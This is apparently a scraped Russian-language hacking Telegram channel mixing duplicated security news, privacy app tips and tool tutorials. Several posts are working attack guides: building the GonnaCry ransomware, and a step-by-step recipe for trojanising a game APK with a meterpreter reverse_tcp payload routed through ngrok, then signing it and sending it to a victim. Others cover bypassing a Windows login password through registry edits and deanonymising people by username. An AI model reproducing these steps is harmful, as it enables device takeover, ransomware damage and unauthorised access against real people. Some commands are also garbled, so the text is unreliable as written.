Как создать изолированное пространство в смартфоне?
Для пользователей, что ставят свою конфиденциальность превыше всего, разработали полезное приложение, с открытым исходным кодом, которое носит название «Shelter».
Его основной особенностью, является запуска приложения в отдельной, изолированной от всех других программ и ваших данных «песочнице», что равносильно запуску на стороннем устройстве.
Следовательно, пользователь сможет уберечь себя от приложений с вредоносным кодом, которые пытаются следить и воровать данные, а также от «закладок» в самой операционной системе или кастомной прошивке, которая используется.
В дополнении, при помощи Shelter, можно замораживать работоспособность приложений, или клонировать их, в случае, если вам необходимо сразу несколько активных аккаунтов в социальных сетях или сервисах.
📌https://4pda.ru/forum/index.php?showtopic=917380
#приложения #android #безопасность
Для пользователей, что ставят свою конфиденциальность превыше всего, разработали полезное приложение, с открытым исходным кодом, которое носит название «Shelter».
Его основной особенностью, является запуска приложения в отдельной, изолированной от всех других программ и ваших данных «песочнице», что равносильно запуску на стороннем устройстве.
Следовательно, пользователь сможет уберечь себя от приложений с вредоносным кодом, которые пытаются следить и воровать данные, а также от «закладок» в самой операционной системе или кастомной прошивке, которая используется.
В дополнении, при помощи Shelter, можно замораживать работоспособность приложений, или клонировать их, в случае, если вам необходимо сразу несколько активных аккаунтов в социальных сетях или сервисах.
📌https://4pda.ru/forum/index.php?showtopic=917380
#приложения #android #безопасность
Киберкомандование США усилило поиск иностранных хакеров перед выборами
Кибернетическое командование США расширило свои зарубежные операции, направленные на поиск иностранных хакерских группировок с целью выявить и предотвратить возможные кибератаки со стороны других правительств.
«С 2018 года мы расширили нашу охоту на всех основных противников. Мы хотим найти плохих парней во вражеском киберпространстве, в их собственной операционной среде. Мы хотим убить лучника, а не уклоняться от стрел», — сообщил в интервью The New York Times заместитель главы киберкомандования Чарльз Л. Мур-младший (Charles L. Moore Jr.).
В прошлом операции Киберкомандования были сосредоточены в основном на России. Но перед выборами в нынешнем году сотрудники разведки рассказали об усилиях не только России, но также Ирана и Китая с целью потенциально повлиять на выборы.
Напомним, в январе нынешнего года Киберкомандование оказалось не готовым к большим объемам данных, полученным в результате взлома информационной инфраструктуры террористической организации ДАИШ (является запрещенной в РФ). Хотя операция по взлому учетных записей и серверов ДАИШ прошла успешно, у Киберкомандования не хватило места для хранения извлеченных материалов.
#новость
Кибернетическое командование США расширило свои зарубежные операции, направленные на поиск иностранных хакерских группировок с целью выявить и предотвратить возможные кибератаки со стороны других правительств.
«С 2018 года мы расширили нашу охоту на всех основных противников. Мы хотим найти плохих парней во вражеском киберпространстве, в их собственной операционной среде. Мы хотим убить лучника, а не уклоняться от стрел», — сообщил в интервью The New York Times заместитель главы киберкомандования Чарльз Л. Мур-младший (Charles L. Moore Jr.).
В прошлом операции Киберкомандования были сосредоточены в основном на России. Но перед выборами в нынешнем году сотрудники разведки рассказали об усилиях не только России, но также Ирана и Китая с целью потенциально повлиять на выборы.
Напомним, в январе нынешнего года Киберкомандование оказалось не готовым к большим объемам данных, полученным в результате взлома информационной инфраструктуры террористической организации ДАИШ (является запрещенной в РФ). Хотя операция по взлому учетных записей и серверов ДАИШ прошла успешно, у Киберкомандования не хватило места для хранения извлеченных материалов.
#новость
Вирус вымогатель для Linux
После пережитых массовых атак шифровальщиками в 2017 году, пользователи и предприятия стали тщательней подходить к защите собственных устройств. Эталоном защищенной операционной системы от вымогателей стал Linux.
Переход на эту ОС частично является выходом, от основных вирусов шифровальщиков WannaCry, Petya или BadRabbit она действительно спасает, но разве не существует подобных для Linux? Существуют, просто не распространены, как и сама операционная система. Делать вирусы вымогатели под Linux не выгодно, поскольку данная ОС работает всего лишь на 1.8% устройств против 88% преподающих на Windows. Так или иначе давайте рассмотрим и убедимся в работе подобного шифровальщика.
Установка и сборка
Тестировать работу вируса нужно на виртуальной машине, в противном случае он может уничтожить важную информацию с основного устройства. Скачаем VirtualBox и установим на неё Kali Linux.
Скачиваем репозиторий с github
#хакинг #kali
После пережитых массовых атак шифровальщиками в 2017 году, пользователи и предприятия стали тщательней подходить к защите собственных устройств. Эталоном защищенной операционной системы от вымогателей стал Linux.
Переход на эту ОС частично является выходом, от основных вирусов шифровальщиков WannaCry, Petya или BadRabbit она действительно спасает, но разве не существует подобных для Linux? Существуют, просто не распространены, как и сама операционная система. Делать вирусы вымогатели под Linux не выгодно, поскольку данная ОС работает всего лишь на 1.8% устройств против 88% преподающих на Windows. Так или иначе давайте рассмотрим и убедимся в работе подобного шифровальщика.
Установка и сборка
Тестировать работу вируса нужно на виртуальной машине, в противном случае он может уничтожить важную информацию с основного устройства. Скачаем VirtualBox и установим на неё Kali Linux.
Скачиваем репозиторий с github
clone https: //github.com/tarcisio-marinho/GonnaCry.gitПереходим в созданную директорию и устанавливаем необходимые библиотеки
GonnaCryТеперь остается собрать вирус. Для этого понадобится Pyinstaller
◽️sudo pip install -r requeriments.txt
pip install pyinstallerПереходим в папку и начинаем сборку
GonnaCryСоздастся файл gonnacry, запустив который все файлы до которых дотянется вирус будут зашифрованы, а обои по традиции заменены на текст с разъяснением произошедшего.
◽️pyinstaller -F --clean main.py -n gonnacry
#хакинг #kali
Атака deface
Deface переводится с английского, как "искажать" или "уродовать". Соответственно одноименная атака направлена на подмену информации расположенной на целевой вебстранице. Она может быть проведена скрытно, как к примеру подмена платежных данных в статье, или с оглаской, то есть изменение заголовков, интеграция банеров с рекламой, замена картинок и т.д.
Реализуется данная атака различными методами. Начиная от уязвимостей в CMS и заканчивая заменами подгружаемых картинок на серверах. Рассмотрим для примера второй вариант. Один пользователь загружает на свой сайт статью. Второй её успешно копирует оставляя подгрузку картинок с хостинга первого. Это вполне логично, ведь зачем тратить место на своем хостинге, если картинки расположены на чужом. Однако это открывает возможность первому пользователю заменить старую картинку на новую сохранив название. Поскольку тег img подгружает картинки по определенному пути, и неважно, что в один момент там находится изображение с котом, а в другой политическая пропаганда. Данный способ использовался для борьбы с копипастерами ещё в начале нулевых.
Однако и сейчас атака deface является не менее популярной. К примеру, 27 октября был взломан сайт предвыборной компании Дональда Трампа. Злоумышленники оставили только одну страницу, которая была схожа с уведомлением об изъятии домена спецслужбами. Как следует из сообщения, сайт был "захвачен", поскольку "мир устал от фальшивых новостей, ежедневно распространяемых президентом Дональдом Трампом". Сообщение продержалось 30 минут, после чего ресурс возобновил работу.
Также стоит вспомнить о массовом дефейсе в 2017 году. Когда в Wordpress обнаружили уязвимость, которая позволяла изменять содержимое статей путем отправки специальных запросов на сайт. По данной уязвимости действовали тогда примерно 20 хакерских группировок, а общее количество взломанных статей оценивалось в 1.5 млн.
Deface переводится с английского, как "искажать" или "уродовать". Соответственно одноименная атака направлена на подмену информации расположенной на целевой вебстранице. Она может быть проведена скрытно, как к примеру подмена платежных данных в статье, или с оглаской, то есть изменение заголовков, интеграция банеров с рекламой, замена картинок и т.д.
Реализуется данная атака различными методами. Начиная от уязвимостей в CMS и заканчивая заменами подгружаемых картинок на серверах. Рассмотрим для примера второй вариант. Один пользователь загружает на свой сайт статью. Второй её успешно копирует оставляя подгрузку картинок с хостинга первого. Это вполне логично, ведь зачем тратить место на своем хостинге, если картинки расположены на чужом. Однако это открывает возможность первому пользователю заменить старую картинку на новую сохранив название. Поскольку тег img подгружает картинки по определенному пути, и неважно, что в один момент там находится изображение с котом, а в другой политическая пропаганда. Данный способ использовался для борьбы с копипастерами ещё в начале нулевых.
Однако и сейчас атака deface является не менее популярной. К примеру, 27 октября был взломан сайт предвыборной компании Дональда Трампа. Злоумышленники оставили только одну страницу, которая была схожа с уведомлением об изъятии домена спецслужбами. Как следует из сообщения, сайт был "захвачен", поскольку "мир устал от фальшивых новостей, ежедневно распространяемых президентом Дональдом Трампом". Сообщение продержалось 30 минут, после чего ресурс возобновил работу.
Также стоит вспомнить о массовом дефейсе в 2017 году. Когда в Wordpress обнаружили уязвимость, которая позволяла изменять содержимое статей путем отправки специальных запросов на сайт. По данной уязвимости действовали тогда примерно 20 хакерских группировок, а общее количество взломанных статей оценивалось в 1.5 млн.
Исходники GitHub выложили на GitHub. В компании отрицают взлом
Администрация сервиса для хостинга IT-проектов и их совместной разработки GitHub вынуждена убеждать своих пользователей в том, что слухи о взломе сервиса не имеют под собой оснований.
Все началось с публикации неизвестным пользователем некоего кода, который, по его словам, является исходным кодом порталов GitHub.com и GitHub Enterprise. Код был добавлен в качестве коммита в раздел GitHub DMCA, причем коммит был сделан так, будто его добавил глава GitHub Нат Фридман (Nat Friedman). Однако, согласно сообщению Фридмана на портале YCombinator Hacker News, он не публиковал код, и GitHub взломан не был.
По словам Фридмана, «утекший исходный код» – это не весь код, а только его часть, относящаяся к продукту GitHub Enterprise Server – локальной версии GitHub.com для команд разработчиков корпоративного ПО. Компании могут развертывать GitHub Enterprise Server на своих серверах для локального хранения своего кода из соображений безопасности и при этом пользоваться всеми функциями полноценного GitHub.
Как пояснил Фридман, утечка исходника GitHub Enterprise Server произошла еще несколько месяцев назад по вине инженеров GitHub, случайно «отправивших некоторым клиентам необработанный/обфусцированный тарбол исходного кода GitHub Enterprise Server». Глава сервиса также пообещал исправить две уязвимости, проэксплуатированные пользователем, опубликовавшим исходный код, которые позволяют неавторизованным сторонам добавлять свой код в чужие проекты под чужим именем.
«Подытожу: все хорошо, ситуация в норме. Птица летит, улитка ползет – и в порядке мир», – написал Фридман.
#новость
Администрация сервиса для хостинга IT-проектов и их совместной разработки GitHub вынуждена убеждать своих пользователей в том, что слухи о взломе сервиса не имеют под собой оснований.
Все началось с публикации неизвестным пользователем некоего кода, который, по его словам, является исходным кодом порталов GitHub.com и GitHub Enterprise. Код был добавлен в качестве коммита в раздел GitHub DMCA, причем коммит был сделан так, будто его добавил глава GitHub Нат Фридман (Nat Friedman). Однако, согласно сообщению Фридмана на портале YCombinator Hacker News, он не публиковал код, и GitHub взломан не был.
По словам Фридмана, «утекший исходный код» – это не весь код, а только его часть, относящаяся к продукту GitHub Enterprise Server – локальной версии GitHub.com для команд разработчиков корпоративного ПО. Компании могут развертывать GitHub Enterprise Server на своих серверах для локального хранения своего кода из соображений безопасности и при этом пользоваться всеми функциями полноценного GitHub.
Как пояснил Фридман, утечка исходника GitHub Enterprise Server произошла еще несколько месяцев назад по вине инженеров GitHub, случайно «отправивших некоторым клиентам необработанный/обфусцированный тарбол исходного кода GitHub Enterprise Server». Глава сервиса также пообещал исправить две уязвимости, проэксплуатированные пользователем, опубликовавшим исходный код, которые позволяют неавторизованным сторонам добавлять свой код в чужие проекты под чужим именем.
«Подытожу: все хорошо, ситуация в норме. Птица летит, улитка ползет – и в порядке мир», – написал Фридман.
#новость
Фильтрация рекламных модулей в Android
Для пользователей, что хотят избавиться от повсеместных рекламных баннеров в программах, существует простое решение в виде отдельного приложение, с названием «personalDNSfilter».
DNSfilter является прокси-фильтром, который подключается к разрешению доменного имени(DNS) и возвращает адрес обратной связи для отфильтрованных хостов. Фильтрация осуществляется полностью локально и работает с любым вышестоящим DNS-сервером.
Следовательно, приложение может использоваться для фильтрации рекламы и другого нежелательного контента на основе списка хостов. Таким образом, это хорошая альтернатива известному «AdBlock».
Для того чтобы фильтрация вступила в силу, необходимо сперва выдать все требуемые решения, а затем открыть приложение. После чего, DNSfilter автоматически начнет работу, что можно понять по характерному ключику в строке состояния.
📌https://4pda.ru/forum/index.php?showtopic=1005986
#приложения #android
Для пользователей, что хотят избавиться от повсеместных рекламных баннеров в программах, существует простое решение в виде отдельного приложение, с названием «personalDNSfilter».
DNSfilter является прокси-фильтром, который подключается к разрешению доменного имени(DNS) и возвращает адрес обратной связи для отфильтрованных хостов. Фильтрация осуществляется полностью локально и работает с любым вышестоящим DNS-сервером.
Следовательно, приложение может использоваться для фильтрации рекламы и другого нежелательного контента на основе списка хостов. Таким образом, это хорошая альтернатива известному «AdBlock».
Для того чтобы фильтрация вступила в силу, необходимо сперва выдать все требуемые решения, а затем открыть приложение. После чего, DNSfilter автоматически начнет работу, что можно понять по характерному ключику в строке состояния.
📌https://4pda.ru/forum/index.php?showtopic=1005986
#приложения #android
Каждый третий смартфон на Android с января перестанет открывать многие сайты
Каждый третий смартфон с операционной системой Android в начале следующего года перестанет открывать многие сайты, об этом сообщил центр сертификации Let’s Encrypt.
Организация предоставляет криптографические сертификаты для TLS-шифрования и намерена перейти на собственные корневые сертификаты. При этом распознать их может только версия Android 7.1.1 и выше.
Отмечается, что только 66,2% смартфонов имеют подходящие версии операционной системы. В остальных случаях при открытии ряда сайтов будет выдаваться ошибка.
Разработчики предложили для решения проблемы с доступом использовать браузер Firefox, который самостоятельно хранит корневые сертификаты. Однако он недоступен в версии Android 4.x и может работать только в Android 5.0 или более новых выпусках.
#новость
Каждый третий смартфон с операционной системой Android в начале следующего года перестанет открывать многие сайты, об этом сообщил центр сертификации Let’s Encrypt.
Организация предоставляет криптографические сертификаты для TLS-шифрования и намерена перейти на собственные корневые сертификаты. При этом распознать их может только версия Android 7.1.1 и выше.
Отмечается, что только 66,2% смартфонов имеют подходящие версии операционной системы. В остальных случаях при открытии ряда сайтов будет выдаваться ошибка.
Разработчики предложили для решения проблемы с доступом использовать браузер Firefox, который самостоятельно хранит корневые сертификаты. Однако он недоступен в версии Android 4.x и может работать только в Android 5.0 или более новых выпусках.
#новость
Идентификация фишинговых ссылок
Внимательность пользователей при переходе по ссылкам для противодействия фишинговым атакам важна, но и сами компании не должны сидеть сложа руки. Сканируя логи сервера на котором расположен сайт, владельцы могут находить подобные фишинговые ссылки и пытаться блокировать или оповещать пользователей о их наличии.
Хорошим софтом для подобного сканирования является PhishingKitHunter. Он анализирует файл журнала сервера на предмет ссылок, которые пытаются скопировать страницы и/или другие файлы с основного сайта. Всю отчетность программа сохраняет в отдельный CSV файл.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github
Опций у программы всего три. Добавление файла журнала осуществляется с помощью ключа -i после которого указывается путь. Для сохранения выходного файла используется -o. Также нужно задать конфигурационный файл с помощью ключа -c.
Пример команды:
Внимательность пользователей при переходе по ссылкам для противодействия фишинговым атакам важна, но и сами компании не должны сидеть сложа руки. Сканируя логи сервера на котором расположен сайт, владельцы могут находить подобные фишинговые ссылки и пытаться блокировать или оповещать пользователей о их наличии.
Хорошим софтом для подобного сканирования является PhishingKitHunter. Он анализирует файл журнала сервера на предмет ссылок, которые пытаются скопировать страницы и/или другие файлы с основного сайта. Всю отчетность программа сохраняет в отдельный CSV файл.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github
clone https://github.com/t4d/PhishingKitHunter.gitТеперь нужно установить зависимости перейдя в созданную директорию с помощью команд
PhishingKitHunter/Использование
pip3 install -r requirements.txt
Опций у программы всего три. Добавление файла журнала осуществляется с помощью ключа -i после которого указывается путь. Для сохранения выходного файла используется -o. Также нужно задать конфигурационный файл с помощью ключа -c.
Пример команды:
./PhishingKitHunter.py -i logs.log -o report.csv -c conf/defaults.conf
Для просмотра отчета можно воспользоваться предустановленной программой catcat report.csv
#kaliМВД России потратило 80 млн рублей на средства взлома смартфонов
С начала 2020 года МВД России потратило 80 миллионов рублей на средства взлома смартфонов. Внимание на это обратило «МБХ медиа».
По данным , самую большую сумму — 59,1 миллиона рублей МВД выделило на аппаратно-программные комплексы (АПК). Сообщается, что они могут взламывать телефоны и извлекать из них информацию, включая скрытые и удаленные данные. В среднем один АПК стоит порядка 1,5 миллиона рублей, а покупать их приходится за рубежом.
Еще 15 миллионов рублей ведомство потратило на программу «Мобильный криминалист», которую разработала отечественная компания «Оксиджен Софтвер». Программа позволяет загружать и анализировать сводки от операторов сотовой связи, а также извлекать файлы, логины и пароли.
Третья категория, на которую МВД выделило 3,2 млн рублей — комплекты UFED от израильской компании Cellebrite. Они позволяют взламывать устройства на Android и iOs и скачивать с них данные, включая переписку в мессенджерах.
#новость
С начала 2020 года МВД России потратило 80 миллионов рублей на средства взлома смартфонов. Внимание на это обратило «МБХ медиа».
По данным , самую большую сумму — 59,1 миллиона рублей МВД выделило на аппаратно-программные комплексы (АПК). Сообщается, что они могут взламывать телефоны и извлекать из них информацию, включая скрытые и удаленные данные. В среднем один АПК стоит порядка 1,5 миллиона рублей, а покупать их приходится за рубежом.
Еще 15 миллионов рублей ведомство потратило на программу «Мобильный криминалист», которую разработала отечественная компания «Оксиджен Софтвер». Программа позволяет загружать и анализировать сводки от операторов сотовой связи, а также извлекать файлы, логины и пароли.
Третья категория, на которую МВД выделило 3,2 млн рублей — комплекты UFED от израильской компании Cellebrite. Они позволяют взламывать устройства на Android и iOs и скачивать с них данные, включая переписку в мессенджерах.
#новость
Массовый поиск соцсетей пользователя по нику
При проведении OSINT часто бывает полезно идентифицировать как можно больше страниц определенного пользователя в социальных сетях. Обычно юзер придумывает себе только один никнейм. И это вполне может привести к деанонимизации, к примеру, если на определенном форуме и на личной странице в Инстаграм у человека стоит один и тот же ник.
Это также может использоваться и против предприятий, как для обычного сбора информации, так и для киберсквотинга, то есть регистрации страницы в соцсети с названием бренда для последующей её перепродажи непосредственно основной компании или использования в мошенических схемах.
И так перейдем к практике. В реализации поиска соц сетей по нику нам поможет Userrecon.
Установка и использование
Скрипт работает на Kali Linux.
Скачиваем репозиторий командой
После чего прописываем интересующий нас никнейм. Можно также вписать несколько ников через пробел, тогда проверяться они будут по очереди.
При проведении OSINT часто бывает полезно идентифицировать как можно больше страниц определенного пользователя в социальных сетях. Обычно юзер придумывает себе только один никнейм. И это вполне может привести к деанонимизации, к примеру, если на определенном форуме и на личной странице в Инстаграм у человека стоит один и тот же ник.
Это также может использоваться и против предприятий, как для обычного сбора информации, так и для киберсквотинга, то есть регистрации страницы в соцсети с названием бренда для последующей её перепродажи непосредственно основной компании или использования в мошенических схемах.
И так перейдем к практике. В реализации поиска соц сетей по нику нам поможет Userrecon.
Установка и использование
Скрипт работает на Kali Linux.
Скачиваем репозиторий командой
clone https://github.com/issamelferkh/userrecon.gitПереходим в созданную директорию и ставим права на исполняемый файл
userreconДля начала поиска запускаем утилиту командой
◽️chmod +x userrecon.sh
После чего прописываем интересующий нас никнейм. Можно также вписать несколько ников через пробел, тогда проверяться они будут по очереди.
Больше всего вредоносов для Android поступает из магазина Google Play
Официальный магазин Google Play Store был определен в качестве основного источника вредоносного ПО для Android-устройств. К такому выводу пришли исследователи из NortonLifeLock (ранее Symantec) и Института программного обеспечения IMDEA в Мадриде, Испания.
Эксперты проанализировали происхождение установок приложений на более чем 12 млн Android-устройств за четырехмесячный период с июня по сентябрь 2019 года. В общей сложности исследователи изучили более 34 млн установок APK для 7,9 млн уникальных приложений. В зависимости от различных классификаций вредоносных программ для Android от 10% до 24% проанализированных приложений могут быть описаны как вредоносные или нежелательные.
Как показали результаты исследования, около 67,5% выявленных установок вредоносных приложений поступали из Google Play Store. На втором месте с показателем в 10% оказались сторонние магазины приложений, опровергнув довольно распространенное мнение об их небезопасности.
#новость
Официальный магазин Google Play Store был определен в качестве основного источника вредоносного ПО для Android-устройств. К такому выводу пришли исследователи из NortonLifeLock (ранее Symantec) и Института программного обеспечения IMDEA в Мадриде, Испания.
Эксперты проанализировали происхождение установок приложений на более чем 12 млн Android-устройств за четырехмесячный период с июня по сентябрь 2019 года. В общей сложности исследователи изучили более 34 млн установок APK для 7,9 млн уникальных приложений. В зависимости от различных классификаций вредоносных программ для Android от 10% до 24% проанализированных приложений могут быть описаны как вредоносные или нежелательные.
Как показали результаты исследования, около 67,5% выявленных установок вредоносных приложений поступали из Google Play Store. На втором месте с показателем в 10% оказались сторонние магазины приложений, опровергнув довольно распространенное мнение об их небезопасности.
#новость
Замена местоположения на смартфоне
На канале CODE RED уже упоминалась возможность подменять местоположение на Android в посте про создание фейковых пробок. Однако давайте разберем эту тему поподробнее. Всем известно, что некоторые приложения отслеживают координаты устройства и это не очень безопасно.
Повысить анонимность можно подменив местоположение, и сделать это возможно с помощью Hola Fake GPS location. Оно находится в PlayMarket.
Настройка и использование
Для начала работы необходимо включить режим разработчика на смартфоне. Сделать это можно перейдя в настройки, далее "О телефоне", в некоторых моделях поле "Номер сборки" находится именно здесь, но чаще всего нужно перейти ещё во вкладку "Сведения о ПО". Собственно найдя пункт "Номер сборки" по нему необходимо кликнуть 7 раз.
Теперь, когда режим разработчика включен можно открыть приложение Hola. При первом запуске нужно будет нажать на появившуюся кнопку "GO". Откроется всплывающее окно, где нужно кликнуть по "Settings". Откроются все те же настройки, где нужно найти пункт "Выбрать приложение для фиктивных местоположений", нажать на него и непосредственно выбрать Hola Fake GPS.
Остается включить определение местоположения только по GPS спутникам. На каждом устройстве это делается по разному, но в пределах вкладки "Местоположение" или "Локация", в общих настройках.
Готово. Теперь можно возвращаться в приложение, вписывать в поиск любое местоположение и начинать подмену нажав кнопку "GO".
На канале CODE RED уже упоминалась возможность подменять местоположение на Android в посте про создание фейковых пробок. Однако давайте разберем эту тему поподробнее. Всем известно, что некоторые приложения отслеживают координаты устройства и это не очень безопасно.
Повысить анонимность можно подменив местоположение, и сделать это возможно с помощью Hola Fake GPS location. Оно находится в PlayMarket.
Настройка и использование
Для начала работы необходимо включить режим разработчика на смартфоне. Сделать это можно перейдя в настройки, далее "О телефоне", в некоторых моделях поле "Номер сборки" находится именно здесь, но чаще всего нужно перейти ещё во вкладку "Сведения о ПО". Собственно найдя пункт "Номер сборки" по нему необходимо кликнуть 7 раз.
Теперь, когда режим разработчика включен можно открыть приложение Hola. При первом запуске нужно будет нажать на появившуюся кнопку "GO". Откроется всплывающее окно, где нужно кликнуть по "Settings". Откроются все те же настройки, где нужно найти пункт "Выбрать приложение для фиктивных местоположений", нажать на него и непосредственно выбрать Hola Fake GPS.
Остается включить определение местоположения только по GPS спутникам. На каждом устройстве это делается по разному, но в пределах вкладки "Местоположение" или "Локация", в общих настройках.
Готово. Теперь можно возвращаться в приложение, вписывать в поиск любое местоположение и начинать подмену нажав кнопку "GO".
Microsoft призвала отказаться от многофакторной аутентификации по телефону
Директор подразделения по безопасности идентификационных данных Microsoft Алекс Вайнерт призвал пользователей отказаться от методов многофакторной аутентификации по телефону, таких как одноразовые SMS-коды и голосовые звонки. Вместо этого он советует прибегнуть к приложениям для аутентификации и ключам безопасности.
В прошлом году Вайнерт цитировал статистику компании, по которой многофакторная аутентификация (MFA) позволяет предотвратить 99,9% автоатак на пользовательские аккаунты Microsoft. Но в одном из свежих постов он пишет, что по возможности юзерам следует остановить свой выбор на MFA-технологиях, которые не задействуют сотовые сети.
Это связано проблемами в их безопасности: телефонные сообщения и звонки могут быть легко перехвачены посредством программно определяемых радиосистем, фемтосот или инструментов для взлома протокола SS7 (ОКС-7), используемого для маршрутизации звонков и передачи SMS. Одноразовые коды можно украсть с помощью опенсорсных сервисов Modlishka, CredSniper и Evilginx.
Кроме того, злоумышленники могут завладеть кодами при помощи SIM-свопинга, обманом заставив сотрудников мобильного оператора перевыпустить SIM-карту жертвы от её имени. После активации новой SIM-карты с номером жертвы на собственном телефоне хакер получает доступ к любому сервису, к которому привязана проверка по номеру телефона.
Вайнерт называет звонки и сообщения самым небезопасным способом многофакторной аутентификации. По его мнению, в дальнейшем их надёжность будет только снижаться. Неплохой альтернативой будет приложение Microsoft Authenticator, но лучше всего пользоваться физическими ключами безопасности, говорит Вайнерт.
#новость
Директор подразделения по безопасности идентификационных данных Microsoft Алекс Вайнерт призвал пользователей отказаться от методов многофакторной аутентификации по телефону, таких как одноразовые SMS-коды и голосовые звонки. Вместо этого он советует прибегнуть к приложениям для аутентификации и ключам безопасности.
В прошлом году Вайнерт цитировал статистику компании, по которой многофакторная аутентификация (MFA) позволяет предотвратить 99,9% автоатак на пользовательские аккаунты Microsoft. Но в одном из свежих постов он пишет, что по возможности юзерам следует остановить свой выбор на MFA-технологиях, которые не задействуют сотовые сети.
Это связано проблемами в их безопасности: телефонные сообщения и звонки могут быть легко перехвачены посредством программно определяемых радиосистем, фемтосот или инструментов для взлома протокола SS7 (ОКС-7), используемого для маршрутизации звонков и передачи SMS. Одноразовые коды можно украсть с помощью опенсорсных сервисов Modlishka, CredSniper и Evilginx.
Кроме того, злоумышленники могут завладеть кодами при помощи SIM-свопинга, обманом заставив сотрудников мобильного оператора перевыпустить SIM-карту жертвы от её имени. После активации новой SIM-карты с номером жертвы на собственном телефоне хакер получает доступ к любому сервису, к которому привязана проверка по номеру телефона.
Вайнерт называет звонки и сообщения самым небезопасным способом многофакторной аутентификации. По его мнению, в дальнейшем их надёжность будет только снижаться. Неплохой альтернативой будет приложение Microsoft Authenticator, но лучше всего пользоваться физическими ключами безопасности, говорит Вайнерт.
#новость
Как создать вирус удаленного доступа на Android 10
Попутно тому, как смартфоны становятся частью человеческой жизни, возникает все больше новых зловредных программ ориентированных под мобильные операционные системы. И если раньше можно было не переживать, качая софт только с официального магазина, то теперь злоумышленники научились обходить и профессиональные системы идентификации вирусов.
Разновидностей зловредов стало также больше. Под Андроид появились свои шифровальщики, стиллеры и бекдоры. О последних сегодня и пойдет речь. В качестве демонстрации будет представлен процесс создания вируса удаленного доступа, только не с помощью вспомогательных программ, а своими руками. Заражать будем тестовый apk файл с игрой.
Установка необходимых компонентов
Устанавливаем Kali Linux.
Далее установим Zipalign
Сборка бекдора
Запускаем в отдельном окне ngrok
Компилируем отредактированный файл игры в apk
Попутно тому, как смартфоны становятся частью человеческой жизни, возникает все больше новых зловредных программ ориентированных под мобильные операционные системы. И если раньше можно было не переживать, качая софт только с официального магазина, то теперь злоумышленники научились обходить и профессиональные системы идентификации вирусов.
Разновидностей зловредов стало также больше. Под Андроид появились свои шифровальщики, стиллеры и бекдоры. О последних сегодня и пойдет речь. В качестве демонстрации будет представлен процесс создания вируса удаленного доступа, только не с помощью вспомогательных программ, а своими руками. Заражать будем тестовый apk файл с игрой.
Установка необходимых компонентов
Устанавливаем Kali Linux.
Далее установим Zipalign
apt-get install -y zipalignЕщё нам понадобятся программы keytool и jarsigner, которые находятся в Java SDK. Утилиту Apktool можно скачать запустив этот файл. Также понадобятся предустановленные ngrok и Metasploit.
Сборка бекдора
Запускаем в отдельном окне ngrok
tcp 4444Полученные lhost и lport используем для создания пейлоада
-p android/meterpreter/reverse_tcp LHOST=<адресс lhost> LPORT=<значение lport>M> /home/kali/payload.apkНа выходе получаем apk файл. Его и файл игры, в которую будем вшивать вирус, нужно распаковать с помощью комманд
d game.apkТеперь остается преобразить загрузочный файл бекдора. Копируем папку metasploit по пути /payload/smali/com/ в /game/smali/com/. Теперь переходим в папку /game/smali/com/dotgears/game/ и открываем файл SplashScreen.smali. В нем находим метку "virtual methods" и после строки начинающейся на invoke-super, то есть на строку под номером 34, вставляем
◽️apktool d payload.apk
{p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
Теперь нужно обновить запрос разрешений при установке. Для этого переходим в папку payload и из файла AndroidManifest.xml копируем все теги uses-permission. Вставляем их в аналогичный файл AndroidManifest.xml в папке game, удалив при этом находящиеся там теги uses-permission. Компилируем отредактированный файл игры в apk
b gameГотовый файл нужно искать в game/dist/. Остается его подписать. Генерируем подпись коммандой
-genkey -V -keystore key.keystore -alias codered -keyalg RSA -keysize 2048 -validity 1000Получаем файл key.keystore. Теперь сертифицируем наш apk
-verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore game.apk coderedВыравниваем подписанное приложение командой
-v 4 game.apk game_good.apkГотово! Теперь можно захватывать сессию на целевом смартфоне отослав туда данный apk файл. Атакуемое устройство, в нашем случае, должно находиться в локальной сети с атакующим, поскольку мы изначально в целях демонстрации выбрали такие параметры в ngrok.
Как сбросить пароль на Windows 10
При покупке б/у устройства или при неправильной установке операционной системы довольно часто появляется необходимость сбросить пароль доступа. В новых версиях реализована удобная система восстановления пароля с помощью вопросов. Ответы на них задает сам пользователь на этапе установки Windows.
Однако что если это не применимо для конкретной ситуации? Пароль Windows можно легко обойти без посторонних программ. Понадобится только загрузочная флешка с данной операционной системой.
Процесс сброса пароля
Загрузитесь с флешки и в открывшимся окне установки нажмите Shift+F10(Shift+Fn+F10 на некоторых ноутбуках).
Откроется командная строка, в которой надо ввести regedit и нажать Enter.
Далее откроется редактор реестра. В нем выбираем HKEYLOCALMACHINE, кликаем на "Файл" потом на "Загрузить куст". Задайте любое имя и нажмите "Ок".
Создастся раздел реестра под заданным именем в HKEYLOCALMACHINE. В нем нужно найти подраздел "Setup" и открыть его.
На правой панели нужно кликнуть два раза по параметру CmdLine. В открывшемся окне задать cmd.exe и нажать "ОК". Также нужно поменять значение параметра SetupType на 2.
Далее нужно выбрать раздел с заданным вами ранее именем, кликнуть на "Файл", затем "Выгрузить куст" и подтвердить выгрузку.
Почти готово, теперь можно закрывать все окна и перезагружаться с жесткого диска. При запуске системы откроется командная строка.
В ней нужно вписать команду
Далее нужно откатить правки в реестре. Вписываем в консоль regedit и переходим к разделу HKEYLOCALMACHINE\System\Setup. Из параметра CmdLine удаляем значение, а в SetupType прописываем 0.
Готово! Теперь можно закрывать редактор и командную строку, перезагружать устройство и авторизовываться с помощью нового пароля.
При покупке б/у устройства или при неправильной установке операционной системы довольно часто появляется необходимость сбросить пароль доступа. В новых версиях реализована удобная система восстановления пароля с помощью вопросов. Ответы на них задает сам пользователь на этапе установки Windows.
Однако что если это не применимо для конкретной ситуации? Пароль Windows можно легко обойти без посторонних программ. Понадобится только загрузочная флешка с данной операционной системой.
Процесс сброса пароля
Загрузитесь с флешки и в открывшимся окне установки нажмите Shift+F10(Shift+Fn+F10 на некоторых ноутбуках).
Откроется командная строка, в которой надо ввести regedit и нажать Enter.
Далее откроется редактор реестра. В нем выбираем HKEYLOCALMACHINE, кликаем на "Файл" потом на "Загрузить куст". Задайте любое имя и нажмите "Ок".
Создастся раздел реестра под заданным именем в HKEYLOCALMACHINE. В нем нужно найти подраздел "Setup" и открыть его.
На правой панели нужно кликнуть два раза по параметру CmdLine. В открывшемся окне задать cmd.exe и нажать "ОК". Также нужно поменять значение параметра SetupType на 2.
